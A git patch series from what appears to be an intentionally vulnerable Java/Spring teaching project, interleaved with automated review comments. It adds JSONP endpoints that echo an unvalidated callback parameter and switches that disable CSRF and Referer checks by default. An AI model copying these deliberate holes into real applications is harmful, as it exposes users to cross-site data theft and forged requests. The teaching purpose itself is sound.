From 6844b0a7f0dc9e1bfc65de94ead593dffd73b982 Mon Sep 17 00:00:00 2001 From: JoyChou Date: Wed, 3 Jul 2019 16:11:29 +0800 Subject: [PATCH 01/67] add configure code of json to jsonp --- README.md | 2 +- README_zh.md | 2 +- .../java/org/joychou/controller/JSONP.java | 71 --------------- .../org/joychou/controller/jsonp/JSONP.java | 89 +++++++++++++++++++ .../joychou/controller/jsonp/JSONPAdvice.java | 12 +++ .../java/org/joychou/security/secFilter.java | 10 +++ src/main/resources/application.properties | 5 +- 7 files changed, 117 insertions(+), 74 deletions(-) delete mode 100644 src/main/java/org/joychou/controller/JSONP.java create mode 100644 src/main/java/org/joychou/controller/jsonp/JSONP.java create mode 100644 src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java diff --git a/README.md b/README.md index c7f42841..fe8e008b 100644 --- a/README.md +++ b/README.md @@ -15,7 +15,7 @@ Each vulnerability type code has a security vulnerability by default unless ther Sort by letter. -- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback.xml) +- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback-online.xml) - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java) - [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java) - [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/WebSecurityConfig.java) diff --git a/README_zh.md b/README_zh.md index 1d8a5d3b..2cffe424 100644 --- a/README_zh.md +++ b/README_zh.md 
@@ -12,7 +12,7 @@ ## 漏洞代码 -- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback.xml) +- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback-online.xml) - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java) - [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java) - [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/WebSecurityConfig.java) diff --git a/src/main/java/org/joychou/controller/JSONP.java b/src/main/java/org/joychou/controller/JSONP.java deleted file mode 100644 index 77bc47f4..00000000 --- a/src/main/java/org/joychou/controller/JSONP.java +++ /dev/null 
@@ -1,71 +0,0 @@ -package org.joychou.controller; - -import org.joychou.security.SecurityUtil; -import org.springframework.stereotype.Controller; -import org.springframework.web.bind.annotation.*; -import javax.servlet.http.HttpServletRequest; -import javax.servlet.http.HttpServletResponse; - - -/** - * @author JoyChou (joychou@joychou.org) - * @date 2018年10月24日 - */ - -@Controller -@RequestMapping("/jsonp") -public class JSONP { - - protected static String info = "{\"name\": \"JoyChou\", \"phone\": \"18200001111\"}"; - protected static String[] urlwhitelist = {"joychou.com", "joychou.org"}; - - - // http://localhost:8080/jsonp/referer?callback=test - @RequestMapping("/referer") - @ResponseBody - private static String referer(HttpServletRequest request, HttpServletResponse response) { - // JSONP的跨域设置 - response.setHeader("Access-Control-Allow-Origin", "*"); - String callback = request.getParameter("callback"); - return callback + "(" + info + ")"; - } - - /** - * 直接访问不限制Referer,非直接访问限制Referer (开发同学喜欢这样进行JSONP测试) - * http://localhost:8080/jsonp/emptyReferer?callback=test - * - */ - @RequestMapping("/emptyReferer") - @ResponseBody - private static String emptyReferer(HttpServletRequest request, HttpServletResponse response) { - String referer = request.getHeader("referer"); - response.setHeader("Access-Control-Allow-Origin", "*"); - - // 如果referer不为空,并且referer不在安全域名白名单内,return error - // 导致空referer就会绕过校验。开发同学为了方便测试,不太喜欢校验空Referer - if (null != referer && !SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) { - return "error"; - } - - String callback = request.getParameter("callback"); - return callback + "(" + info + ")"; - } - - // http://localhost:8080/jsonp/sec?callback=test - @RequestMapping("/sec") - @ResponseBody - private static String sec(HttpServletRequest request, HttpServletResponse response) { - // JSONP的跨域设置 - response.setHeader("Access-Control-Allow-Origin", "*"); - String referer = request.getHeader("referer"); - - if 
(!SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) { - return "error"; - } - - String callback = request.getParameter("callback"); - return callback + "(" + info + ")"; - } - - -} \ No newline at end of file diff --git a/src/main/java/org/joychou/controller/jsonp/JSONP.java b/src/main/java/org/joychou/controller/jsonp/JSONP.java new file mode 100644 index 00000000..f78b2aa8 --- /dev/null +++ b/src/main/java/org/joychou/controller/jsonp/JSONP.java 
@@ -0,0 +1,89 @@ +package org.joychou.controller.jsonp; + +import com.alibaba.fastjson.JSON; +import com.alibaba.fastjson.JSONObject; +import org.joychou.security.SecurityUtil; +import org.springframework.http.MediaType; +import org.springframework.web.bind.annotation.*; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; + + + +/** + * @author JoyChou (joychou@joychou.org) @ 2018.10.24 + * https://github.com/JoyChou93/java-sec-code/wiki/JSONP + */ + +@RestController +@RequestMapping("/jsonp") +public class JSONP { + + private static String info = "{\"name\": \"JoyChou\", \"phone\": \"18200001111\"}"; + private static String[] urlwhitelist = {"joychou.com", "joychou.org"}; + + + /** + * Set the response content-type to application/javascript. + * + * http://localhost:8080/jsonp/referer?callback=test + * + */ + @RequestMapping(value = "/referer", produces = "application/javascript") + private static String referer(HttpServletRequest request, HttpServletResponse response) { + String callback = request.getParameter("callback"); + return callback + "(" + info + ")"; + } + + /** + * Direct access does not check Referer, non-direct access check referer. + * Developer like to do jsonp testing like this. + * + * http://localhost:8080/jsonp/emptyReferer?callback=test + * + */ + @RequestMapping(value = "/emptyReferer", produces = "application/javascript") + private static String emptyReferer(HttpServletRequest request, HttpServletResponse response) { + String referer = request.getHeader("referer"); + + if (null != referer && !SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) { + return "error"; + } + + String callback = request.getParameter("callback"); + return callback + "(" + info + ")"; + } + + /** + * Adding callback or cback on parameter can automatically return jsonp data. 
+ * http://localhost:8080/jsonp/advice?callback=test + * http://localhost:8080/jsonp/advice?cback=test + * + * @return Only return object, AbstractJsonpResponseBodyAdvice can be used successfully. + * Such as JSONOjbect or JavaBean. String type cannot be used. + */ + @RequestMapping(value = "/advice", produces = MediaType.APPLICATION_JSON_VALUE) + public JSONObject advice() { + return JSON.parseObject(info); + + } + + /** + * Safe code. + * http://localhost:8080/jsonp/sec?callback=test + */ + @RequestMapping(value = "/sec", produces = "application/javascript") + private static String safecode(HttpServletRequest request, HttpServletResponse response) { + String referer = request.getHeader("referer"); + + if (!SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) { + return "error"; + } + + String callback = request.getParameter("callback"); + return callback + "(" + info + ")"; + } + + + +} \ No newline at end of file diff --git a/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java b/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java new file mode 100644 index 00000000..19b3a6e0 --- /dev/null +++ b/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java @@ -0,0 +1,12 @@ +package org.joychou.controller.jsonp; + +import org.springframework.web.bind.annotation.ControllerAdvice; +import org.springframework.web.servlet.mvc.method.annotation.AbstractJsonpResponseBodyAdvice; + +@ControllerAdvice +public class JSONPAdvice extends AbstractJsonpResponseBodyAdvice { + + public JSONPAdvice() { + super("callback", "cback"); // Can set multiple paramNames + } +} diff --git a/src/main/java/org/joychou/security/secFilter.java b/src/main/java/org/joychou/security/secFilter.java index 072f7fca..a7f443f3 100644 --- a/src/main/java/org/joychou/security/secFilter.java +++ b/src/main/java/org/joychou/security/secFilter.java 
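Review bot: In `safecode` (the handler whose Javadoc says "Safe code") the `callback` query parameter is still concatenated unvalidated into an `application/javascript` body, `return callback + "(" + info + ")";`, so the Referer allowlist is the only control on that route; restricting the name to an identifier pattern before use, e.g. `if (callback == null || !callback.matches("[A-Za-z0-9_.]+")) return "error";`, limits the response to invoking a function name, which is what Spring's `AbstractJsonpResponseBodyAdvice` (used by `/advice`) does for its own parameter in recent versions. `safecode` also hands a possibly null `referer` straight to `SecurityUtil.checkURLbyEndsWith`, whose null handling is not visible in this patch, so an explicit `if (referer == null) return "error";` would make the fail-closed intent clear. The `referer` and `emptyReferer` handlers appear intentionally vulnerable, in line with the README's statement that each type carries a vulnerability by default, so this applies only to the variant labelled safe.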
@@ -7,6 +7,7 @@ import javax.servlet.http.HttpServletResponse; import java.io.IOException; import org.apache.commons.lang.StringUtils; +import org.springframework.beans.factory.annotation.Value; /** @@ -19,6 +20,9 @@ @WebFilter(filterName = "referSecCheck", urlPatterns = "/*") public class secFilter implements Filter { + @Value("${org.joychou.security.jsonp}") + private Boolean jsonpSwitch; // get application.properties configure + @Override public void init(FilterConfig filterConfig) throws ServletException { @@ -28,6 +32,12 @@ public void init(FilterConfig filterConfig) throws ServletException { public void doFilter(ServletRequest req, ServletResponse res, FilterChain filterChain) throws IOException, ServletException { + + // If don't check referer, return. + if (!jsonpSwitch) { + return ; + } + HttpServletRequest request = (HttpServletRequest) req; HttpServletResponse response = (HttpServletResponse) res; diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties index cdb84e53..47fdf5a3 100644 --- a/src/main/resources/application.properties +++ b/src/main/resources/application.properties @@ -1,4 +1,7 @@ # Spring Boot Actuator Vulnerable Config management.security.enabled=false -logging.config=classpath:logback-online.xml \ No newline at end of file +logging.config=classpath:logback-online.xml + +# jsonp check referer switch +org.joychou.security.jsonp = true \ No newline at end of file From f37f9b2bc45d87653a70b4d0760e6e325508ebc9 Mon Sep 17 00:00:00 2001 
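Review bot: The added early return in `doFilter`, `if (!jsonpSwitch) { return ; }`, exits without calling `filterChain.doFilter(req, res)`, so with the switch off every request under `urlPatterns = "/*"` is dropped with an empty response instead of merely skipping the Referer check. Guarding only the check and always continuing the chain is the fix — wrap the existing `if (request.getMethod().equals("GET") …)` block in `if (jsonpSwitch) { … }`, which is what patch 03 in this series does. A placeholder default, `@Value("${org.joychou.security.jsonp:true}")`, lets a missing property fail closed rather than abort startup. The remainder of `doFilter`, including the chain call, is outside this hunk.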
From: JoyChou Date: Wed, 3 Jul 2019 23:35:11 +0800 Subject: [PATCH 02/67] add csrf switch --- README.md | 4 ++-- README_zh.md | 4 ++-- .../{ => security}/CsrfAccessDeniedHandler.java | 10 +++++----- .../joychou/{ => security}/WebSecurityConfig.java | 14 +++++++++++++- .../security/{secFilter.java => jsonpFilter.java} | 2 +- src/main/resources/application.properties | 5 +++-- 6 files changed, 26 insertions(+), 13 deletions(-) rename src/main/java/org/joychou/{ => security}/CsrfAccessDeniedHandler.java (91%) rename src/main/java/org/joychou/{ => security}/WebSecurityConfig.java (86%) rename src/main/java/org/joychou/security/{secFilter.java => jsonpFilter.java} (97%) diff --git a/README.md b/README.md index fe8e008b..b1f4b020 100644 --- a/README.md +++ b/README.md 
@@ -18,13 +18,13 @@ Sort by letter. - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback-online.xml) - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java) - [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java) -- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/WebSecurityConfig.java) +- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java) - [Deserialize](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Deserialize.java) - [Fastjson](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Fastjson.java) - [File Upload](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/FileUpload.java) - [IP Forge](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java) - [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java) -- [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/JSONP.java) +- [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/jsonp/JSONP.java) - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java) - [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java) - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java) diff --git a/README_zh.md b/README_zh.md index 2cffe424..e5d00569 100644 --- a/README_zh.md +++ b/README_zh.md 
@@ -15,13 +15,13 @@ - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback-online.xml) - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java) - [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java) -- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/WebSecurityConfig.java) +- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java) - [Deserialize](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Deserialize.java) - [Fastjson](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Fastjson.java) - [File Upload](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/FileUpload.java) - [IP Forge](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java) - [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java) -- [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/JSONP.java) +- [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/jsonp/JSONP.java) - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java) - [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java) - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java) 
diff --git a/src/main/java/org/joychou/CsrfAccessDeniedHandler.java b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java similarity index 91% rename from src/main/java/org/joychou/CsrfAccessDeniedHandler.java rename to src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java index ed043ac2..81b6b0f2 100644 --- a/src/main/java/org/joychou/CsrfAccessDeniedHandler.java +++ b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java @@ -1,4 +1,4 @@ -package org.joychou; +package org.joychou.security; import org.springframework.http.MediaType; @@ -11,12 +11,12 @@ import javax.servlet.http.HttpServletResponse; import java.io.IOException; +/** + * Design csrf access denied page. + * + */ public class CsrfAccessDeniedHandler implements AccessDeniedHandler { - /** - * Design csrf access denied page. - * - */ @Override public void handle(HttpServletRequest request, HttpServletResponse response, AccessDeniedException accessDeniedException) throws IOException, ServletException { diff --git a/src/main/java/org/joychou/WebSecurityConfig.java b/src/main/java/org/joychou/security/WebSecurityConfig.java similarity index 86% rename from src/main/java/org/joychou/WebSecurityConfig.java rename to src/main/java/org/joychou/security/WebSecurityConfig.java index 5254547e..68af7121 100644 --- a/src/main/java/org/joychou/WebSecurityConfig.java +++ b/src/main/java/org/joychou/security/WebSecurityConfig.java @@ -1,5 +1,6 @@ -package org.joychou; +package org.joychou.security; +import org.springframework.beans.factory.annotation.Value; import org.springframework.context.annotation.Configuration; import org.springframework.security.config.annotation.web.builders.HttpSecurity; import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity; 
@@ -10,10 +11,18 @@ import java.util.Arrays; import java.util.HashSet; + +/** + * Congifure csrf + * + */ @EnableWebSecurity @Configuration public class WebSecurityConfig extends WebSecurityConfigurerAdapter { + @Value("${org.joychou.security.csrf}") + private Boolean csrfSwitch; // get csrf switch in application.properties + RequestMatcher csrfRequestMatcher = new RequestMatcher() { // 配置不需要CSRF校验的请求方式 @@ -23,6 +32,9 @@ public class WebSecurityConfig extends WebSecurityConfigurerAdapter { @Override public boolean matches(HttpServletRequest request) { // return false表示不校验csrf + if (!csrfSwitch) { + return false; + } return !this.allowedMethods.contains(request.getMethod()); } diff --git a/src/main/java/org/joychou/security/secFilter.java b/src/main/java/org/joychou/security/jsonpFilter.java similarity index 97% rename from src/main/java/org/joychou/security/secFilter.java rename to src/main/java/org/joychou/security/jsonpFilter.java index a7f443f3..7fd2f123 100644 --- a/src/main/java/org/joychou/security/secFilter.java +++ b/src/main/java/org/joychou/security/jsonpFilter.java @@ -18,7 +18,7 @@ * */ @WebFilter(filterName = "referSecCheck", urlPatterns = "/*") -public class secFilter implements Filter { +public class jsonpFilter implements Filter { @Value("${org.joychou.security.jsonp}") private Boolean jsonpSwitch; // get application.properties configure diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties index 47fdf5a3..a0469477 100644 --- a/src/main/resources/application.properties +++ b/src/main/resources/application.properties @@ -1,7 +1,8 @@ # Spring Boot Actuator Vulnerable Config management.security.enabled=false -logging.config=classpath:logback-online.xml +# logging.config=classpath:logback-online.xml # jsonp check referer switch -org.joychou.security.jsonp = true \ No newline at end of file +org.joychou.security.jsonp = true +org.joychou.security.csrf = false \ No newline at end of file 
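Review bot: The class Javadoc added here reads `Congifure csrf`; `Configure CSRF protection; the check is toggled by org.joychou.security.csrf` would fix the typo and tell the reader where the switch lives. The comment on `csrfSwitch`, `// get csrf switch in application.properties`, could also name the consequence of the switch: when the property is false every request bypasses the CSRF matcher. The enclosing class continues outside the hunk.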
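Review bot: The new `if (!csrfSwitch) { return false; }` in `matches` turns CSRF protection off for the whole application, and the application.properties change in this same commit sets `org.joychou.security.csrf = false`, so the shipped default is no CSRF check anywhere rather than only on the demo routes. If the switch is meant for the vulnerable demo endpoints, scope it to those paths — the `ignoringAntMatchers` list further down the class is the existing mechanism — and keep the global default on; a placeholder default such as `@Value("${org.joychou.security.csrf:true}")` makes a missing property fail closed instead of failing startup. The anonymous `RequestMatcher` is cut by the hunk edges, so the rest of the matcher is not visible here.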
From d330c45a517d9369ea33f16492648fc5ab0a3626 Mon Sep 17 00:00:00 2001 From: JoyChou Date: Thu, 4 Jul 2019 00:09:35 +0800 Subject: [PATCH 03/67] fix bug --- .../org/joychou/security/jsonpFilter.java | 21 ++++++++----------- src/main/resources/application.properties | 2 +- 2 files changed, 10 insertions(+), 13 deletions(-) diff --git a/src/main/java/org/joychou/security/jsonpFilter.java b/src/main/java/org/joychou/security/jsonpFilter.java index 7fd2f123..e88d854f 100644 --- a/src/main/java/org/joychou/security/jsonpFilter.java +++ b/src/main/java/org/joychou/security/jsonpFilter.java @@ -32,27 +32,24 @@ public void init(FilterConfig filterConfig) throws ServletException { public void doFilter(ServletRequest req, ServletResponse res, FilterChain filterChain) throws IOException, ServletException { - - // If don't check referer, return. - if (!jsonpSwitch) { - return ; - } - HttpServletRequest request = (HttpServletRequest) req; HttpServletResponse response = (HttpServletResponse) res; String refer = request.getHeader("referer"); String referWhitelist[] = {"joychou.org", "joychou.com"}; - // Check referer for all GET requests with callback parameters. - if (request.getMethod().equals("GET") && StringUtils.isNotBlank(request.getParameter("callback")) ){ - // If the check of referer fails, a 403 forbidden error page will be returned. - if (!SecurityUtil.checkURLbyEndsWith(refer, referWhitelist)){ - response.sendRedirect("https://test.joychou.org/error3.html"); - return; + if (jsonpSwitch) { + // Check referer for all GET requests with callback parameters. + if (request.getMethod().equals("GET") && StringUtils.isNotBlank(request.getParameter("callback")) ){ + // If the check of referer fails, a 403 forbidden error page will be returned. + if (!SecurityUtil.checkURLbyEndsWith(refer, referWhitelist)){ + response.sendRedirect("https://test.joychou.org/error3.html"); + return; + } } } + filterChain.doFilter(req, res); } 
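Review bot: The comment kept inside the new `if (jsonpSwitch)` block says a 403 forbidden page is returned, but the code does `response.sendRedirect("https://test.joychou.org/error3.html")`, which is a 302 to an external host; either `response.sendError(HttpServletResponse.SC_FORBIDDEN)` or a corrected comment would make the two agree. `refer` may be null when the header is absent and is passed straight to `SecurityUtil.checkURLbyEndsWith`, whose null handling is outside this diff, so an explicit null check with the fail-closed result is worth stating in code. The hard-coded `referWhitelist` duplicates `urlwhitelist` in `JSONP.java` from patch 01; a single shared constant (or, as patch 04 does, a property) avoids the two lists drifting.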
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties index a0469477..a3b3a4bb 100644 --- a/src/main/resources/application.properties +++ b/src/main/resources/application.properties @@ -4,5 +4,5 @@ management.security.enabled=false # logging.config=classpath:logback-online.xml # jsonp check referer switch -org.joychou.security.jsonp = true +org.joychou.security.jsonp = false org.joychou.security.csrf = false \ No newline at end of file From f24df6fe46e24234e9367992df06d80414e1801b Mon Sep 17 00:00:00 2001 From: JoyChou Date: Mon, 8 Jul 2019 18:04:14 +0800 Subject: [PATCH 04/67] add json to jsonp --- .../joychou/controller/jsonp/JSONPAdvice.java | 7 +- .../security/CsrfAccessDeniedHandler.java | 6 ++ .../java/org/joychou/security/HttpFilter.java | 89 +++++++++++++++++++ .../org/joychou/security/SecurityUtil.java | 14 ++- .../joychou/security/WebSecurityConfig.java | 23 +++-- .../org/joychou/security/jsonpFilter.java | 60 ------------- src/main/resources/application.properties | 27 +++++- 7 files changed, 151 insertions(+), 75 deletions(-) create mode 100644 src/main/java/org/joychou/security/HttpFilter.java delete mode 100644 src/main/java/org/joychou/security/jsonpFilter.java diff --git a/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java b/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java index 19b3a6e0..094070a4 100644 --- a/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java +++ b/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java 
@@ -1,12 +1,15 @@ package org.joychou.controller.jsonp; +import org.springframework.beans.factory.annotation.Value; import org.springframework.web.bind.annotation.ControllerAdvice; import org.springframework.web.servlet.mvc.method.annotation.AbstractJsonpResponseBodyAdvice; + @ControllerAdvice public class JSONPAdvice extends AbstractJsonpResponseBodyAdvice { - public JSONPAdvice() { - super("callback", "cback"); // Can set multiple paramNames + // method of using @Value in constructor + public JSONPAdvice(@Value("${joychou.security.jsonp.callback}") String[] callback) { + super(callback); // Can set multiple paramNames } } diff --git a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java index 81b6b0f2..65d9e6f3 100644 --- a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java +++ b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java @@ -1,6 +1,8 @@ package org.joychou.security; +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; import org.springframework.http.MediaType; import org.springframework.security.access.AccessDeniedException; import org.springframework.security.web.access.AccessDeniedHandler; @@ -17,9 +19,13 @@ */ public class CsrfAccessDeniedHandler implements AccessDeniedHandler { + private final Logger logger= LoggerFactory.getLogger(CsrfAccessDeniedHandler.class); + @Override public void handle(HttpServletRequest request, HttpServletResponse response, AccessDeniedException accessDeniedException) throws IOException, ServletException { + + logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t" + "Referer: " + request.getHeader("referer")); response.setContentType(MediaType.TEXT_HTML_VALUE); // content-type: text/html response.setStatus(HttpServletResponse.SC_FORBIDDEN); // 403 forbidden response.getWriter().write("CSRF check failed by JoyChou."); // response contents 
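Review bot: `AbstractJsonpResponseBodyAdvice` has been deprecated since Spring Framework 5.1 in favour of CORS, so this constructor ties the JSONP demo to a class slated for removal; the pom is not visible in this patch, so which Spring version the project resolves cannot be confirmed here. The comment `// method of using @Value in constructor` describes syntax rather than intent — `// callback parameter names come from joychou.security.jsonp.callback (comma-separated)` would tell the reader what the array holds and where it is configured.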
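Review bot: The new `logger.info` call in `handle` concatenates the raw request URL, query string and Referer header into the log message; all three are caller-controlled, so CRLF sequences in them can forge additional log lines, and a query string may contain tokens or credentials that should not be persisted. Prefer the parameterized form, `logger.info("[-] URL: {}?{}\tReferer: {}", request.getRequestURL(), request.getQueryString(), request.getHeader("referer"))`, and strip control characters (or log only the path) before emitting; `HttpFilter` in this same patch has the identical line. `getQueryString()` renders as `null` when absent, so the `"?"` is better made conditional, and a `private static final` logger is the usual per-class convention.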
diff --git a/src/main/java/org/joychou/security/HttpFilter.java b/src/main/java/org/joychou/security/HttpFilter.java new file mode 100644 index 00000000..99309410 --- /dev/null +++ b/src/main/java/org/joychou/security/HttpFilter.java 
@@ -0,0 +1,89 @@ +package org.joychou.security; + + +import javax.servlet.*; +import javax.servlet.annotation.WebFilter; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import java.io.IOException; + +import org.apache.commons.lang.StringUtils; +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; +import org.springframework.beans.factory.annotation.Value; +import org.springframework.util.AntPathMatcher; +import org.springframework.util.PathMatcher; + + +/** + * Check referer for all GET requests with callback parameters. + * If the check of referer fails, a 403 forbidden error page will be returned. + * + * Still need to add @ServletComponentScan annotation in Application.java. + * + */ +@WebFilter(filterName = "referFilter", urlPatterns = "/*") +public class HttpFilter implements Filter { + + @Value("${joychou.security.referer.enabled}") + private Boolean referSecEnabled = false; + + @Value("${joychou.security.jsonp.callback}") + private String[] callbacks; + + @Value("${joychou.security.referer.hostwhitelist}") + private String[] referWhitelist; + + @Value("${joychou.security.referer.uri}") + private String[] referUris; + + @Override + public void init(FilterConfig filterConfig) throws ServletException { + + } + + private final Logger logger= LoggerFactory.getLogger(HttpFilter.class); + + @Override + public void doFilter(ServletRequest req, ServletResponse res, FilterChain filterChain) + throws IOException, ServletException { + + HttpServletRequest request = (HttpServletRequest) req; + HttpServletResponse response = (HttpServletResponse) res; + + String refer = request.getHeader("referer"); + PathMatcher matcher = new AntPathMatcher(); + boolean isMatch = false; + for (String uri: referUris) { + if ( matcher.match (uri, request.getRequestURI()) ) { + isMatch = true; + break; + } + } + + if (isMatch) { + if (referSecEnabled) { + // Check referer for all GET requests with callback parameters. 
+ for (String callback: callbacks) { + if (request.getMethod().equals("GET") && StringUtils.isNotBlank(request.getParameter(callback)) ){ + // If the check of referer fails, a 403 forbidden error page will be returned. + if (!SecurityUtil.checkURLbyEndsWith(refer, referWhitelist)){ + logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t" + "Referer: " + refer); + response.sendRedirect("https://test.joychou.org/error3.html"); + return; + } + } + } + } + } + + + + filterChain.doFilter(req, res); + } + + @Override + public void destroy() { + + } +} diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java index 6eab2cac..63de75d8 100644 --- a/src/main/java/org/joychou/security/SecurityUtil.java +++ b/src/main/java/org/joychou/security/SecurityUtil.java @@ -55,11 +55,23 @@ public static Boolean checkSSRF(String url) { /** * Suitable for: TTL isn't set to 0 & Redirect is forbidden. * - * @param url the url needs to check + * @param url The url that needs to check. * @return Safe url returns true. Dangerous url returns false. */ public static boolean checkSSRFWithoutRedirect(String url) { return !SSRFChecker.isInnerIPByUrl(url); } + /** + * Check SSRF by host white list. + * This is the simplest and most effective method to fix ssrf vul. + * + * @param url The url that needs to check. + * @param hostWlist host whitelist + * @return Safe url returns true. Dangerous url returns false. + */ + public static boolean checkSSRFByHostWlist(String url, String[] hostWlist) { + return checkURLbyEndsWith(url, hostWlist); + } + } \ No newline at end of file diff --git a/src/main/java/org/joychou/security/WebSecurityConfig.java b/src/main/java/org/joychou/security/WebSecurityConfig.java index 68af7121..5ad22e2b 100644 --- a/src/main/java/org/joychou/security/WebSecurityConfig.java +++ b/src/main/java/org/joychou/security/WebSecurityConfig.java 
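Review bot: The URI allowlist in `doFilter` is matched against the raw `request.getRequestURI()`, while the controllers are dispatched on the decoded, normalized path, so the two can disagree for percent-encoded or dot-segment forms of the same path and the filter would then not apply; matching on `new UrlPathHelper().getLookupPathForRequest(request)` keeps the filter and the handler mapping in agreement, and the `AntPathMatcher` can be a `private static final` field instead of a per-request allocation. The class comment and the inline comment promise a 403 while the code issues `response.sendRedirect(...)` to an external page (a 302), the same mismatch as `jsonpFilter` in patch 03; `response.sendError(HttpServletResponse.SC_FORBIDDEN)` would match the documentation. The `logger.info` line concatenates the raw query string and Referer into the message, with the log-forging and secret-leak concerns noted on `CsrfAccessDeniedHandler` in this patch. The `= false` initializer on `referSecEnabled` is overwritten by `@Value`, and a missing property fails startup rather than falling back to it; `@Value("${joychou.security.referer.enabled:true}")` expresses a default and fails closed.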
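Review bot: `checkSSRFByHostWlist` delegates entirely to `checkURLbyEndsWith`, which is not in this hunk, yet its Javadoc calls it "the simplest and most effective method to fix ssrf vul"; that holds only if the helper parses the URL and compares the host component on a label boundary (equal to an entry, or ending in `"." + entry`), so the Javadoc should state that precondition or the method should parse with `java.net.URI` itself before comparing. The `@param hostWlist` line should also say whether a null or empty list is rejected or treated as allow-all, since the fail-safe choice is to return false.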
